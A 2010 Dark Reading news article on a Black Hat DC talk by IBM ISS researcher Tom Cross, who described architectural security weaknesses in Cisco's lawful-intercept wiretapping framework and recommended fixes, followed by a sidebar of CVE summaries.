Attacks/Breaches
2/3/2010
01:03 PM
Connect Directly
Google+
Twitter
RSS
E-Mail
50%
50%

IBM ISS Researcher Exposes Holes In Cisco's Internet Surveillance Architecture

Wiretapping architecture could be abused by individuals under surveillance and outside attackers; Cisco reviews recommended fixes

WASHINGTON, D.C. -- Black Hat DC 2010 -- An IBM ISS researcher here today revealed major security holes in a little-known wiretapping architecture for IP networks created by Cisco Systems for law enforcement. The weaknesses could result in an attacker interfering with legal surveillance or performing some unauthorized surveillance of his own.

Tom Cross, manager of X-Force Research at IBM ISS, says he first discovered the Cisco Architecture for Lawful Intercept in IP Networks, which was published as an IETF RFC in 2004, four years ago. The document, also known as IETF RFC 3924, is based on the lawful intercept architecture used by the European Telecommunications Standards Institute, and is implemented in Cisco's edge and switch routers -- the 7600, 10000, 12000, and AS5000 series products. Cross says other vendors also have deployed the architecture within their network devices.

Cross says an alleged criminal could discover that he was under law enforcement's surveillance using the current architecture, allowing him to manipulate or corrupt the information collected or to use the surveillance information for nefarious purposes.

Cisco had previously patched a SNMPv3 vulnerability in its router models used in the wiretapping architecture, but Cross says the architecture itself needs some repair, pointing out multiple weaknesses that could be exploited by attackers -- which he says he handed over to Cisco in December 2008.

Jennifer Greeson, communications director at Cisco, who was on hand at Cross' Black Hat presentation, says Cisco has been looking over his recommendations and, perhaps, how to incorporate them, she says.

"We are confident in our framework. That's why we published it: We recognize that security is very important" in this architecture, Greeson says.

Today was the first time Cross -- who says he had to put the effort on the back burner until recently due to other commitments -- has gone public with his research on the wiretapping architecture's weaknesses. Cisco's legal surveillance framework defines the architecture from which the "mediation device" remotely gathers intelligence on behalf of law enforcement from the surveillance target (someone under law enforcement investigation). Vendors such as Digivox, NICE Systems, Verint, and Utimaco make these systems. "The mediation device is the heart of the architecture," Cross says. "It is used by the administrator to provision" the surveillance and sends instructions to the devices that perform the actual surveillance, he says. That information is then reformatted and sent directly to law enforcement, he says.

Cross listed six weaknesses in Cisco's architecture that could lead to security breaches in surveillance: SNMPv3's susceptibility to brute-force credential discovery; password vulnerability in SNMPv3; lack of audit trails; the surveillance output stream's flexibility; the interface's vulnerability to packet-spoofing; and that the RFC doesn't require encryption.

While Cisco has patched the SNMPv3 authentication flaws (CVE-2008-0960), that doesn't mean its customers all have deployed those patches, he warns. Router patching is a particularly onerous process that often gets superseded by operational disruption concerns.

Even so, Cross says the biggest issues are architectural ones that must be fixed by Cisco and the IETF. "These are harder problems that require more thought," he says.

"My greatest concern is the lack of audit trails," he says. An attacker can "turn off" the audit trail, for instance, leaving the victim organization unaware of the activity. Attacks on routers that haven't patched for the SNMPv3 authentication flaw could easily be tracked with traps that monitor for these attacks, according to Cross.

Cross says Cisco's configuration guide for the architecture recommends that network administrators enable SNMP trap notifications to detect potential threats on SNMPv3 authentication, and it "implies" that traps will be sent for packets that carry an incorrect authentication key or any other packet that isn't part of the approved access list.

"I tested this, and there were no authentication traps. So I sent this to Cisco and said it didn't work," Cross says. "Cisco said the implementation was right, but the documentation was wrong [and rewrote the documentation]. So now it no longer says traps are generated.

"But a network administrator would want to know if his network was under attack."

Cross' recommendations to Cisco and the IETF include using a different port for surveillance, such as SNMP over TCP, which would be less prone to spoofing, limiting the addresses for the output stream, and moving notification control into the router configuration so that network administrators won't be able to monitor surveillance or interfere with it.

ISPs in their deployments for law-enforcement surveillance should not only patch for the SNMPv3 flaw, but also use encryption -- namely IPSec encryption, Cross says. Assigning user-group IP access control lists can help seal the authorized user of the lawful intercept action to the proper mediation device, he says. "Also, build out-of-band management networks," he says.

Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message. Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

Comment  | 
Print  | 
More Insights
Register for Dark Reading Newsletters
White Papers
Flash Poll
Current Issue
Cartoon
Video
Slideshows
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2014-3341
Published: 2014-08-19
The SNMP module in Cisco NX-OS 7.0(3)N1(1) and earlier on Nexus 5000 and 6000 devices provides different error messages for invalid requests depending on whether the VLAN ID exists, which allows remote attackers to enumerate VLANs via a series of requests, aka Bug ID CSCup85616.

CVE-2014-3464
Published: 2014-08-19
The EJB invocation handler implementation in Red Hat JBossWS, as used in JBoss Enterprise Application Platform (EAP) 6.2.0 and 6.3.0, does not properly enforce the method level restrictions for outbound messages, which allows remote authenticated users to access otherwise restricted JAX-WS handlers ...

CVE-2014-3472
Published: 2014-08-19
The isCallerInRole function in SimpleSecurityManager in JBoss Application Server (AS) 7, as used in Red Hat JBoss Enterprise Application Platform (JBEAP) 6.3.0, does not properly check caller roles, which allows remote authenticated users to bypass access restrictions via unspecified vectors.

CVE-2014-3490
Published: 2014-08-19
RESTEasy 2.3.1 before 2.3.8.SP2 and 3.x before 3.0.9, as used in Red Hat JBoss Enterprise Application Platform (EAP) 6.3.0, does not disable external entities when the resteasy.document.expand.entity.references parameter is set to false, which allows remote attackers to read arbitrary files and have...

CVE-2014-3504
Published: 2014-08-19
The (1) serf_ssl_cert_issuer, (2) serf_ssl_cert_subject, and (3) serf_ssl_cert_certificate functions in Serf 0.2.0 through 1.3.x before 1.3.7 does not properly handle a NUL byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers...

Best of the Web
Dark Reading Radio
Archived Dark Reading Radio
Dark Reading continuing coverage of the Black Hat 2014 conference brings interviews and commentary to Dark Reading listeners.